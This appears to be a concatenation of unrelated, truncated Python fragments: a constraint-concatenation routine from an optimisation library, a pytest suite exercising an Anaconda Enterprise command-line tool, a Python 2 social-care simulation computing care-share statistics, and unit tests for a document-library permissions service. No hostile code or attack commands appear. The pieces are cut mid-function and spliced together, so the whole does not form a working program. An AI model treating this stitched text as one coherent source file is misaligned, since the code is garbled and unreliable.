"""Concatenate sequence of CanonicalConstraint's."""
# Compute number of constraints
n_eq = 0
n_ineq = 0
for constr in constraints:
n_eq += constr.n_eq
n_ineq += constr.n_ineq
# Get n_vars
n_vars = 0
x0 = None
for constr in constraints:
if n_vars == 0:
n_vars = constr.n_vars
x0 = constr.x0
if n_vars != constr.n_vars:
raise RuntimeError("Unmatching constraint number of arguments.")
if not np.array_equal(x0, constr.x0):
raise RuntimeError("Unmatching initial point.")
# Concatenate constraints
def new_constr(x):
constr_list = [constr.constr(x) for constr in constraints]
return _concatenate_constr(constr_list)
constr0_list = [(constr.c_ineq0, constr.c_eq0) for constr in constraints]
c_ineq0, c_eq0 = _concatenate_constr(constr0_list)
# Use sparse if any of the matrices are sparse
use_sparse = np.any([constr.sparse_jacobian for constr in constraints])
if use_sparse:
def new_jac(x):
jac_list = [constr.jac(x) for constr in constraints]
return _concatenate_sparse_jac(jac_list)
jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints]
J_ineq0, J_eq0 = _concatenate_sparse_jac(jac0_list)
else:
def new_jac(x):
jac_list = [constr.jac(x) for constr in constraints]
return _concatenate_dense_jac(jac_list)
jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints]
J_ineq0, J_eq0 = _concatenate_dense_jac(jac0_list)
# Concatenate Hessians
def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
hess_list = []
| |
<filename>tests/test_cli.py
import pytest
import tempfile
import time
import os
import pytest
import pprint
import requests
import tarfile
import glob
import uuid
from datetime import datetime
from collections import namedtuple
from ae5_tools.api import AEUnexpectedResponseError
from .utils import _cmd, _compare_tarfiles, CMDException
@pytest.fixture(scope='module')
def project_list(user_session):
return _cmd('project list --collaborators')
def test_project_info(project_list):
for rec0 in project_list:
id = rec0['id']
pair = '{}/{}'.format(rec0['owner'], rec0['name'])
rec1 = _cmd(f'project info {id}')
rec2 = _cmd(f'project info {pair}')
rec3 = _cmd(f'project info {pair}/{id}')
assert all(rec0[k] == v for k, v in rec2.items()), pprint.pformat((rec0, rec2))
assert all(rec1[k] == v for k, v in rec2.items()), pprint.pformat((rec1, rec2))
assert rec2 == rec3
def test_project_info_errors(project_list):
with pytest.raises(CMDException) as excinfo:
_cmd('project info testproj1')
assert 'Multiple projects' in str(excinfo.value)
with pytest.raises(CMDException) as excinfo:
_cmd('project info testproj4')
assert 'No projects' in str(excinfo.value)
@pytest.fixture(scope='module')
def resource_profiles(user_session):
return _cmd('resource-profile list')
def test_resource_profiles(resource_profiles):
for rec in resource_profiles:
rec2 = _cmd(f'resource-profile info {rec["name"]}')
assert rec == rec2
with pytest.raises(CMDException) as excinfo:
_cmd(f'resource-profile info *')
assert 'Multiple resource profiles found' in str(excinfo.value)
with pytest.raises(CMDException) as excinfo:
_cmd(f'resource-profile info abcdefg')
assert 'No resource profiles found' in str(excinfo.value)
@pytest.fixture(scope='module')
def editors(user_session):
return _cmd('editor list')
def test_editors(editors):
for rec in editors:
assert rec == _cmd(f'editor info {rec["id"]}')
assert sum(rec['is_default'].lower() == 'true' for rec in editors) == 1
assert set(rec['id'] for rec in editors).issuperset({'zeppelin', 'jupyterlab', 'notebook'})
def test_endpoints():
slist = _cmd('endpoint list')
for rec in slist:
rec2 = _cmd(f'endpoint info {rec["id"]}')
assert rec == rec2
def test_samples():
slist = _cmd(f'sample list')
assert sum(rec['is_default'].lower() == 'true' for rec in slist) == 1
assert sum(rec['is_template'].lower() == 'true' for rec in slist) > 1
for rec in slist:
rec2 = _cmd(f'sample info "{rec["id"]}"')
rec3 = _cmd(f'sample info "{rec["name"]}"')
assert rec == rec2 and rec == rec3
def test_sample_clone():
cname = 'NLP-API'
pname = 'testclone'
rrec1 = _cmd(f'sample clone {cname} --name {pname}')
with pytest.raises(CMDException) as excinfo:
_cmd(f'sample clone {cname} --name {pname}')
rrec2 = _cmd(f'sample clone {cname} --name {pname} --make-unique')
rrec3 = _cmd(f'sample clone {cname}')
_cmd(f'project delete {rrec1["id"]}')
_cmd(f'project delete {rrec2["id"]}')
_cmd(f'project delete {rrec3["id"]}')
@pytest.fixture(scope='module')
def cli_project(project_list):
return next(rec for rec in project_list if rec['name'] == 'testproj3')
@pytest.fixture(scope='module')
def cli_revisions(cli_project):
prec = cli_project
revs = _cmd(f'project revision list {prec["id"]}')
return prec, revs
@pytest.fixture(scope='module')
def downloaded_project(user_session, cli_revisions):
prec, revs = cli_revisions
with tempfile.TemporaryDirectory() as tempd:
fname = _cmd(f'project download {prec["id"]}', table=False).strip()
assert fname == prec['name'] + '.tar.gz'
with tarfile.open(fname, 'r') as tf:
tf.extractall(path=tempd)
dnames = glob.glob(os.path.join(tempd, '*', 'anaconda-project.yml'))
assert len(dnames) == 1
dname = os.path.dirname(dnames[0])
yield fname, dname
for r in _cmd('project list'):
if r['name'].startswith('test_upload'):
_cmd(f'project delete {r["id"]}')
assert not any(r['name'].startswith('test_upload')
for r in _cmd('project list'))
def test_project_download(downloaded_project):
pass
def test_project_upload(downloaded_project):
fname, dname = downloaded_project
_cmd(f'project upload {fname} --name test_upload1 --tag 1.2.3')
rrec = _cmd(f'project revision list test_upload1')
assert len(rrec) == 1
rev = rrec[0]['name']
fname2 = _cmd(f'project download test_upload1:{rev}', table=False).strip()
assert fname2 == f'test_upload1-{rev}.tar.gz'
assert os.path.exists(fname2)
_compare_tarfiles(fname, fname2)
if rev == '0.0.1':
pytest.xfail("5.4.1 revision issue")
assert rev == '1.2.3'
def test_project_upload_as_directory(downloaded_project):
fname, dname = downloaded_project
_cmd(f'project upload {dname} --name test_upload2 --tag 1.3.4')
rrec = _cmd(f'project revision list test_upload2')
assert len(rrec) == 1
rev = rrec[0]['name']
fname2 = _cmd(f'project download test_upload2:{rev}', table=False).strip()
assert fname2 == f'test_upload2-{rev}.tar.gz'
assert os.path.exists(fname2)
if rev == '0.0.1':
pytest.xfail("5.4.1 revision issue")
assert rev == '1.2.3'
def test_project_revisions(cli_revisions):
prec, revs = cli_revisions
rev0 = _cmd(f'project revision info {prec["id"]}')
assert revs[0] == rev0
rev0 = _cmd(f'project revision info {prec["id"]}:latest')
assert revs[0] == rev0
for rev in revs:
revN = _cmd(f'project revision info {prec["id"]}:{rev["id"]}')
assert rev == revN
def test_project_revision_errors(cli_revisions):
prec, revs = cli_revisions
with pytest.raises(CMDException) as excinfo:
_cmd(f'project revision info testproj1')
assert 'Multiple projects' in str(excinfo.value)
with pytest.raises(CMDException) as excinfo:
_cmd(f'project revision info testproj4')
assert 'No projects' in str(excinfo.value)
with pytest.raises(CMDException) as excinfo:
_cmd(f'project revision info {prec["id"]}:0.*')
assert 'Multiple revisions' in str(excinfo.value)
with pytest.raises(CMDException) as excinfo:
_cmd(f'project revision info {prec["id"]}:a.b.c')
assert 'No revisions' in str(excinfo.value)
def test_project_patch(cli_project, editors, resource_profiles):
prec = cli_project
old, new = {}, {}
for what, wlist in (('resource-profile', (r['name'] for r in resource_profiles)),
('editor', (e['id'] for e in editors))):
old[what] = prec[what.replace('-', '_')]
new[what] = next(v for v in wlist if v != old)
prec2 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in new.items()))
assert {k: prec2[k.replace('-', '_')] for k in new} == new
prec3 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in old.items()))
assert {k: prec3[k.replace('-', '_')] for k in old} == old
def test_project_collaborators(cli_project, project_list):
prec = cli_project
uname = next(rec['owner'] for rec in project_list if rec['owner'] != prec['owner'])
id = prec['id']
with pytest.raises(CMDException) as excinfo:
_cmd(f'project collaborator info {id} {uname}')
assert f'No collaborators found matching id={uname}' in str(excinfo.value)
clist = _cmd(f'project collaborator add {id} {uname}')
assert len(clist) == 1
clist = _cmd(f'project collaborator add {id} everyone --group --read-only')
assert len(clist) == 2
assert all(c['id'] == uname and c['permission'] == 'rw' and c['type'] == 'user' or
c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group'
for c in clist)
clist = _cmd(f'project collaborator add {id} {uname} --read-only')
assert len(clist) == 2
assert all(c['id'] == uname and c['permission'] == 'r' and c['type'] == 'user' or
c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group'
for c in clist)
clist = _cmd(f'project collaborator remove {id} {uname} everyone')
assert len(clist) == 0
with pytest.raises(CMDException) as excinfo:
clist = _cmd(f'project collaborator remove {id} {uname}')
assert f'Collaborator(s) not found: {uname}' in str(excinfo.value)
def test_project_activity(cli_project):
prec = cli_project
activity = _cmd(f'project activity {prec["id"]}')
assert 1 <= len(activity) <= 10
activity2 = _cmd(f'project activity --latest {prec["id"]}')
assert activity[0] == activity2
activity3 = _cmd(f'project activity --limit 1 {prec["id"]}')
assert activity[0] == activity3[0]
with pytest.raises(CMDException) as excinfo:
_cmd(f'project activity --latest --all {prec["id"]}')
with pytest.raises(CMDException) as excinfo:
_cmd(f'project activity --limit 2 --all {prec["id"]}')
with pytest.raises(CMDException) as excinfo:
_cmd(f'project activity --latest --limit 2 {prec["id"]}')
@pytest.fixture(scope='module')
def cli_session(cli_project):
prec = cli_project
srec = _cmd(f'session start {prec["owner"]}/{prec["name"]}')
srec2 = _cmd(f'session restart {srec["id"]} --wait')
assert not any(r['id'] == srec['id'] for r in _cmd('session list'))
yield prec, srec2
_cmd(f'session stop {srec2["id"]}')
assert not any(r['id'] == srec2['id'] for r in _cmd('session list'))
def test_session(cli_session):
prec, srec = cli_session
assert srec['owner'] == prec['owner'], srec
assert srec['name'] == prec['name'], srec
# Ensure that the session can be retrieved by its project ID as well
srec2 = _cmd(f'session info {srec["owner"]}/*/{prec["id"]}')
assert srec2['id'] == srec['id']
endpoint = srec['id'].rsplit("-", 1)[-1]
sdata = _cmd(f'call / --endpoint={endpoint}', table=False)
assert 'Jupyter Notebook requires JavaScript.' in sdata, sdata
def test_project_sessions(cli_session):
prec, srec = cli_session
slist = _cmd(f'project sessions {prec["id"]}')
assert len(slist) == 1 and slist[0]['id'] == srec['id']
def test_session_branches(cli_session):
prec, srec = cli_session
branches = _cmd(f'session branches {prec["id"]}')
bdict = {r['branch']: r['sha1'] for r in branches}
assert set(bdict) == {'local', 'origin/local', 'master'}, branches
assert bdict['local'] == bdict['master'], branches
def test_session_before_changes(cli_session):
prec, srec = cli_session
changes1 = _cmd(f'session changes {prec["id"]}')
changes1 = [c for c in changes1 if c['path'] != '.projectignore']
assert changes1 == [], changes1
changes2 = _cmd(f'session changes --master {prec["id"]}')
changes2 = [c for c in changes1 if c['path'] != '.projectignore']
assert changes2 == [], changes2
@pytest.fixture(scope='module')
def cli_deployment(cli_project):
prec = cli_project
dname = 'testdeploy'
ename = 'testendpoint'
drec = _cmd(f'project deploy {prec["owner"]}/{prec["name"]} --name {dname} --endpoint {ename} --command default --private')
drec2 = _cmd(f'deployment restart {drec["id"]} --wait')
assert not any(r['id'] == drec['id'] for r in _cmd('deployment list'))
yield prec, drec2
_cmd(f'deployment stop {drec2["id"]}')
assert not any(r['id'] == drec2['id'] for r in _cmd('deployment list'))
def test_deploy(cli_deployment):
prec, drec = cli_deployment
assert drec['owner'] == prec['owner'], drec
assert drec['project_name'] == prec['name'], drec
for attempt in range(3):
try:
ldata = _cmd(f'call / --endpoint {drec["endpoint"]}', table=False)
break
except AEUnexpectedResponseError:
time.sleep(attempt * 5)
pass
else:
raise RuntimeError("Could not get the endpoint to respond")
assert ldata.strip() == 'Hello Anaconda Enterprise!', ldata
def test_project_deployments(cli_deployment):
prec, drec = cli_deployment
dlist = _cmd(f'project deployments {prec["id"]}')
assert len(dlist) == 1 and dlist[0]['id'] == drec['id']
def test_deploy_patch(cli_deployment):
prec, drec = cli_deployment
flag = '--private' if drec['public'].lower() == 'true' else '--public'
drec2 = _cmd(f'deployment patch {flag} {drec["id"]}')
assert drec2['public'] != drec['public']
flag = '--private' if drec2['public'].lower() == 'true' else '--public'
drec3 = _cmd(f'deployment patch {flag} {drec["id"]}')
assert drec3['public'] == drec['public']
def test_deploy_token(user_session, cli_deployment):
prec, drec = cli_deployment
token = _cmd(f'deployment token {drec["id"]}', table=False).strip()
resp = requests.get(f'https://{drec["endpoint"]}.' + user_session.hostname,
headers={'Authorization': f'Bearer {token}'},
verify=False)
assert resp.status_code == 200
assert resp.text.strip() == 'Hello Anaconda Enterprise!', | |
= [x for x in class_5 if x.status == 'inactive']
totalCareDemand_5 = float(sum([x.hoursDemand for x in class_5]))
socialCareDemand_5 = float(sum([x.hoursDemand for x in inactivePeople_5]))
shareSocialCare_5 = 0
if totalCareDemand_5 > 0:
shareSocialCare_5 = socialCareDemand_5/totalCareDemand_5
# Graph 8
informalCareReceived = sum([x.informalCare for x in self.pop.livingPeople])
formalCareReceived = sum([x.formalCare for x in self.pop.livingPeople])
totalCareReceived = informalCareReceived + formalCareReceived
totalUnnmetCareNeed = sum([x.residualNeed for x in self.pop.livingPeople])
# Graph 5
perCapitaCareReceived = totalCareReceived/currentPop
perCapitaUnmetCareDemand = totalUnnmetCareNeed/currentPop
# Graph 12
informalSocialCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.informalCare > 0])
formalSocialCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.formalCare > 0])
socialCareReceived = informalSocialCareReceived + formalSocialCareReceived
unmetSocialCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.residualNeed > 0])
if socialCareReceived != 0:
print 'Share of unmet social care: ' + str(unmetSocialCareNeed/socialCareReceived)
# Graph 6
perCapitaSocialCareReceived = socialCareReceived/currentPop
perCapitaUnmetSocialCareDemand = unmetSocialCareNeed/currentPop
# Graph 13
informalChildCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.status == 'child'])
formalChildCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.status == 'child'])
childCareReceived = informalChildCareReceived + formalChildCareReceived
unmetChildCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.status == 'child'])
# Graph 7
perCapitaChildCareReceived = childCareReceived/currentPop
perCapitaUnmetChildCareDemand = unmetChildCareNeed/currentPop
# Graph 9:
shareInformalCareReceived = 0
if totalCareReceived > 0:
shareInformalCareReceived = informalCareReceived/totalCareReceived
informalSocialCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'inactive'])
formalSocialCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'inactive'])
socialCareReceived_1 = informalSocialCareReceived_1 + formalSocialCareReceived_1
informalChildCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'child'])
formalChildCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'child'])
childCareReceived_1 = informalChildCareReceived_1 + formalChildCareReceived_1
totalInformalCare_1 = informalChildCareReceived_1 + informalSocialCareReceived_1
totalFormalCare_1 = formalChildCareReceived_1 + formalSocialCareReceived_1
totalCare_1 = socialCareReceived_1 + childCareReceived_1
shareInformalCareReceived_1 = 0
if totalCare_1 > 0:
shareInformalCareReceived_1 = totalInformalCare_1/totalCare_1
informalSocialCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'inactive'])
formalSocialCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'inactive'])
socialCareReceived_2 = informalSocialCareReceived_2 + formalSocialCareReceived_2
informalChildCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'child'])
formalChildCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'child'])
childCareReceived_2 = informalChildCareReceived_2 + formalChildCareReceived_2
totalInformalCare_2 = informalChildCareReceived_2 + informalSocialCareReceived_2
totalFormalCare_2 = formalChildCareReceived_2 + formalSocialCareReceived_2
totalCare_2 = socialCareReceived_2 + childCareReceived_2
shareInformalCareReceived_2 = 0
if totalCare_2 > 0:
shareInformalCareReceived_2 = totalInformalCare_2/totalCare_2
informalSocialCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'inactive'])
formalSocialCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'inactive'])
socialCareReceived_3 = informalSocialCareReceived_3 + formalSocialCareReceived_3
informalChildCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'child'])
formalChildCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'child'])
childCareReceived_3 = informalChildCareReceived_3 + formalChildCareReceived_3
totalInformalCare_3 = informalChildCareReceived_3 + informalSocialCareReceived_3
totalFormalCare_3 = formalChildCareReceived_3 + formalSocialCareReceived_3
totalCare_3 = socialCareReceived_3 + childCareReceived_3
shareInformalCareReceived_3 = 0
if totalCare_3 > 0:
shareInformalCareReceived_3 = totalInformalCare_3/totalCare_3
informalSocialCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'inactive'])
formalSocialCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'inactive'])
socialCareReceived_4 = informalSocialCareReceived_4 + formalSocialCareReceived_4
informalChildCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'child'])
formalChildCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'child'])
childCareReceived_4 = informalChildCareReceived_4 + formalChildCareReceived_4
totalInformalCare_4 = informalChildCareReceived_4 + informalSocialCareReceived_4
totalFormalCare_4 = formalChildCareReceived_4 + formalSocialCareReceived_4
totalCare_4 = socialCareReceived_4 + childCareReceived_4
shareInformalCareReceived_4 = 0
if totalCare_4 > 0:
shareInformalCareReceived_4 = totalInformalCare_4/totalCare_4
informalSocialCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'inactive'])
formalSocialCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'inactive'])
socialCareReceived_5 = informalSocialCareReceived_5 + formalSocialCareReceived_5
informalChildCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'child'])
formalChildCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'child'])
childCareReceived_5 = informalChildCareReceived_5 + formalChildCareReceived_5
totalInformalCare_5 = informalChildCareReceived_5 + informalSocialCareReceived_5
totalFormalCare_5 = formalChildCareReceived_5 + formalSocialCareReceived_5
totalCare_5 = socialCareReceived_5 + childCareReceived_5
shareInformalCareReceived_5 = 0
if totalCare_5 > 0:
shareInformalCareReceived_5 = totalInformalCare_5/totalCare_5
# Graph 10:
shareInformalSocialCare = 0
if socialCareReceived > 0:
shareInformalSocialCare = informalSocialCareReceived/socialCareReceived
shareInformalSocialCare_1 = 0
if socialCareReceived_1 > 0:
shareInformalSocialCare_1 = informalSocialCareReceived_1/socialCareReceived_1
shareInformalSocialCare_2 = 0
if socialCareReceived_2 > 0:
shareInformalSocialCare_2 = informalSocialCareReceived_2/socialCareReceived_2
shareInformalSocialCare_3 = 0
if socialCareReceived_3 > 0:
shareInformalSocialCare_3 = informalSocialCareReceived_3/socialCareReceived_3
shareInformalSocialCare_4 = 0
if socialCareReceived_4 > 0:
shareInformalSocialCare_4 = informalSocialCareReceived_4/socialCareReceived_4
shareInformalSocialCare_5 = 0
if socialCareReceived_5 > 0:
shareInformalSocialCare_5 = informalSocialCareReceived_5/socialCareReceived_5
# Garph 11
shareInformalChildCare = 0
if childCareReceived > 0:
shareInformalChildCare = informalChildCareReceived/childCareReceived
shareInformalChildCare_1 = 0
if childCareReceived_1 > 0:
shareInformalChildCare_1 = informalChildCareReceived_1/childCareReceived_1
shareInformalChildCare_2 = 0
if childCareReceived_2 > 0:
shareInformalChildCare_2 = informalChildCareReceived_2/childCareReceived_2
shareInformalChildCare_3 = 0
if childCareReceived_3 > 0:
shareInformalChildCare_3 = informalChildCareReceived_3/childCareReceived_3
shareInformalChildCare_4 = 0
if childCareReceived_4 > 0:
shareInformalChildCare_4 = informalChildCareReceived_4/childCareReceived_4
shareInformalChildCare_5 = 0
if childCareReceived_5 > 0:
shareInformalChildCare_5 = informalChildCareReceived_5/childCareReceived_5
# Graph 14
shareUnmetCareDemand = 0
if totalCareNeed > 0:
shareUnmetCareDemand = totalUnnmetCareNeed/totalCareNeed
unmetCareNeed_1 = sum([x.residualNeed for x in class_1])
shareUnmetCareDemand_1 = 0
if totalCareDemand_1 > 0:
shareUnmetCareDemand_1 = unmetCareNeed_1/totalCareDemand_1
unmetCareNeed_2 = sum([x.residualNeed for x in class_2])
shareUnmetCareDemand_2 = 0
if totalCareDemand_2 > 0:
shareUnmetCareDemand_2 = unmetCareNeed_2/totalCareDemand_2
unmetCareNeed_3 = sum([x.residualNeed for x in class_3])
shareUnmetCareDemand_3 = 0
if totalCareDemand_3 > 0:
shareUnmetCareDemand_3 = unmetCareNeed_3/totalCareDemand_3
unmetCareNeed_4 = sum([x.residualNeed for x in class_4])
shareUnmetCareDemand_4 = 0
if totalCareDemand_4 > 0:
shareUnmetCareDemand_4 = unmetCareNeed_4/totalCareDemand_4
unmetCareNeed_5 = sum([x.residualNeed for x in class_5])
shareUnmetCareDemand_5 = 0
if totalCareDemand_5 > 0:
shareUnmetCareDemand_5 = unmetCareNeed_5/totalCareDemand_5
# Graph 15
totalSocialCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'inactive'])
shareUnmetSocialCareDemand = 0
if totalSocialCareNeed > 0:
shareUnmetSocialCareDemand = unmetSocialCareNeed/totalSocialCareNeed
unmetSocialCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'inactive'])
totalSocialCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'inactive'])
shareUnmetSocialCareDemand_1 = 0
if totalSocialCareNeed_1 > 0:
shareUnmetSocialCareDemand_1 = unmetSocialCareNeed_1/totalSocialCareNeed_1
unmetSocialCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'inactive'])
totalSocialCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'inactive'])
shareUnmetSocialCareDemand_2 = 0
if totalSocialCareNeed_2 > 0:
shareUnmetSocialCareDemand_2 = unmetSocialCareNeed_2/totalSocialCareNeed_2
unmetSocialCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'inactive'])
totalSocialCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'inactive'])
shareUnmetSocialCareDemand_3 = 0
if totalSocialCareNeed_3 > 0:
shareUnmetSocialCareDemand_3 = unmetSocialCareNeed_3/totalSocialCareNeed_3
unmetSocialCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'inactive'])
totalSocialCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'inactive'])
shareUnmetSocialCareDemand_4 = 0
if totalSocialCareNeed_4 > 0:
shareUnmetSocialCareDemand_4 = unmetSocialCareNeed_4/totalSocialCareNeed_4
unmetSocialCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'inactive'])
totalSocialCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'inactive'])
shareUnmetSocialCareDemand_5 = 0
if totalSocialCareNeed_5 > 0:
shareUnmetSocialCareDemand_5 = unmetSocialCareNeed_5/totalSocialCareNeed_5
# Graph 16
totalChildCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'child'])
shareUnmetChildCareDemand = 0
if totalChildCareNeed > 0:
shareUnmetChildCareDemand = unmetChildCareNeed/totalChildCareNeed
unmetChildCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'child'])
totalChildCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'child'])
shareUnmetChildCareDemand_1 = 0
if totalChildCareNeed_1 > 0:
shareUnmetChildCareDemand_1 = unmetChildCareNeed_1/totalChildCareNeed_1
unmetChildCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'child'])
totalChildCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'child'])
shareUnmetChildCareDemand_2 = 0
if totalChildCareNeed_2 > 0:
shareUnmetChildCareDemand_2 = unmetChildCareNeed_2/totalChildCareNeed_2
unmetChildCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'child'])
totalChildCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'child'])
shareUnmetChildCareDemand_3 = 0
if totalChildCareNeed_3 > 0:
shareUnmetChildCareDemand_3 = unmetChildCareNeed_3/totalChildCareNeed_3
unmetChildCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'child'])
totalChildCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'child'])
shareUnmetChildCareDemand_4 = 0
if totalChildCareNeed_4 > 0:
shareUnmetChildCareDemand_4 = unmetChildCareNeed_4/totalChildCareNeed_4
unmetChildCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'child'])
totalChildCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'child'])
shareUnmetChildCareDemand_5 = 0
if totalChildCareNeed_5 > 0:
shareUnmetChildCareDemand_5 = unmetChildCareNeed_5/totalChildCareNeed_5
# Graph 17
perCapitaUnmetCareDemand_1 = 0
if numClass_1 > 0:
perCapitaUnmetCareDemand_1 = unmetCareNeed_1/numClass_1
perCapitaUnmetCareDemand_2 = 0
if numClass_2 > 0:
perCapitaUnmetCareDemand_2 = unmetCareNeed_2/numClass_2
perCapitaUnmetCareDemand_3 = 0
if numClass_3 > 0:
perCapitaUnmetCareDemand_3 = unmetCareNeed_3/numClass_3
perCapitaUnmetCareDemand_4 = 0
if numClass_4 > 0:
perCapitaUnmetCareDemand_4 = unmetCareNeed_4/numClass_4
perCapitaUnmetCareDemand_5 = 0
if numClass_5 > 0:
perCapitaUnmetCareDemand_5 = unmetCareNeed_5/numClass_5
# Graph 18
numReceivers | |
make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# Make a library that ensures we get one back
stub_library = LibraryShop()
library_dict = self.user_view.create_library(
service_uid=user.id,
library_data=stub_library.user_view_post_data
)
with self.app.session_scope() as session:
library_1 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one()
session.expunge(library_1)
self.document_view.update_library(
library_id=BaseView.helper_slug_to_uuid(library_dict['id']),
library_data=dict(public=True)
)
with self.app.session_scope() as session:
library_2 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one()
self.assertEqual(library_1.date_created, library_2.date_created)
self.assertNotEqual(library_1.date_created,
library_2.date_last_modified)
def test_returned_permissions_are_right(self):
"""
Test that the correct permissions get returned for a library
:return: no return
"""
# Stub data
stub_user_other = UserShop()
# To make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
user_other = User(absolute_uid=stub_user_other.absolute_uid)
with self.app.session_scope() as session:
session.add_all([user, user_other])
session.commit()
session.refresh(user)
session.expunge(user)
session.refresh(user_other)
session.expunge(user_other)
# Make a library to make sure things work properly
stub_library = LibraryShop()
library = self.user_view.create_library(
service_uid=user.id,
library_data=stub_library.user_view_post_data
)
stub_permissions = [{'read': True}, {'write': True}, {'admin': True}]
for permission in stub_permissions:
self.permission_view.add_permission(library_id=BaseView.helper_slug_to_uuid(library['id']),
service_uid=user_other.id,
permission=permission)
# Get the library created
with MockEmailService(stub_user_other, end_type='uid'):
with MockEmailService(self.stub_user, end_type='uid'):
libraries = self.user_view.get_libraries(
service_uid=user_other.id,
absolute_uid=user_other.absolute_uid
)
self.assertEqual(list(permission.keys())[0], libraries[0]['permission'])
def test_can_only_see_number_of_people_with_admin_or_owner(self):
"""
Test that the owner and admin can see the number of people
:return: no return
"""
# To make a library we need an actual user
user_owner = User(absolute_uid=self.stub_user_1.absolute_uid)
user_admin = User(absolute_uid=self.stub_user_2.absolute_uid)
library = Library()
permission_admin = Permissions(permissions={'read': False, 'write': False, 'admin': True, 'owner': False})
permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
library.permissions.append(permission_admin)
library.permissions.append(permission_owner)
user_admin.permissions.append(permission_admin)
user_owner.permissions.append(permission_owner)
with self.app.session_scope() as session:
session.add_all([user_owner, user_admin, library, permission_admin,
permission_owner])
session.commit()
for obj in [user_owner, user_admin, library, permission_admin,
permission_owner]:
session.refresh(obj)
session.expunge(obj)
# Get the library created
# For user admin
with MockEmailService(self.stub_user_2, end_type='uid'):
with MockEmailService(self.stub_user_1, end_type='uid'):
libraries = self.user_view.get_libraries(
service_uid=user_admin.id,
absolute_uid=user_admin.absolute_uid
)[0]
self.assertTrue(libraries['num_users'] > 0)
# For user owner
with MockEmailService(self.stub_user_1, end_type='uid'):
libraries = self.user_view.get_libraries(
service_uid=user_owner.id,
absolute_uid=user_owner.absolute_uid
)[0]
self.assertTrue(libraries['num_users'] > 0)
def test_cannot_see_number_of_people_with_lower_than_admin(self):
"""
Test that the non-owner and non-admin cannot see the number of people
:return: no return
"""
# To make a library we need an actual user
user_read = User(absolute_uid=self.stub_user_1.absolute_uid)
user_write = User(absolute_uid=self.stub_user_2.absolute_uid)
user_owner = User(absolute_uid=self.stub_user_3.absolute_uid)
library = Library()
permission_read = Permissions(permissions={'read': True, 'write': False, 'admin': False, 'owner': False})
permission_write = Permissions(permissions={'read': False, 'write': True, 'admin': False, 'owner': False})
permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
library.permissions.append(permission_read)
library.permissions.append(permission_write)
library.permissions.append(permission_owner)
user_read.permissions.append(permission_read)
user_write.permissions.append(permission_write)
user_owner.permissions.append(permission_owner)
with self.app.session_scope() as session:
session.add_all([user_read, user_write, user_owner, library, permission_read,
permission_write, permission_owner])
session.commit()
for obj in [user_read, user_write, user_owner, library, permission_read,
permission_write, permission_owner]:
session.refresh(obj)
session.expunge(obj)
# Get the library created
# For user read
with MockEmailService(self.stub_user_3, end_type='uid'):
libraries = self.user_view.get_libraries(
service_uid=user_read.id,
absolute_uid=user_read.absolute_uid
)[0]
self.assertTrue(libraries['num_users'] == 0)
